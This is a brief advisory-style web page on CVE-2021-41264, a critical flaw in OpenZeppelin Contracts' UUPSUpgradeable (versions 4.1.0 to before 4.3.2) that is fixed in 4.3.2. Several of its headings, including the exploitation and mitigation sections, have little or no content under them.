CVE-2021-41264 discloses a critical vulnerability in OpenZeppelin Contracts library impacting versions between 4.1.0 and 4.3.2. Learn about its impact, exploitation mechanism, and mitigation steps.
OpenZeppelin Contracts is a library for smart contract development. Upgradeable contracts using
UUPSUpgradeable
versions >= 4.1.0 and < 4.3.2 may be vulnerable to an attack affecting uninitialized implementation contracts. A fix is available in version 4.3.2.
Understanding CVE-2021-41264
What is CVE-2021-41264?
CVE-2021-41264 discloses a vulnerability in the OpenZeppelin Contracts library related to the use of
UUPSUpgradeable
, impacting versions between 4.1.0 and 4.3.2.
The Impact of CVE-2021-41264
The vulnerability poses a critical risk with a CVSS base score of 9.8, allowing attackers to compromise confidentiality, integrity, and availability of affected systems.
Technical Details of CVE-2021-41264
Vulnerability Description
The flaw in
UUPSUpgradeable
implementation contracts can be exploited, potentially causing security breaches and unauthorized access.
Affected Systems and Versions
Exploitation Mechanism
Mitigation and Prevention
Immediate Steps to Take
@openzeppelin/contracts
or @openzeppelin/contracts-upgradeable
UUPSUpgradeable
Long-Term Security Practices
Patching and Updates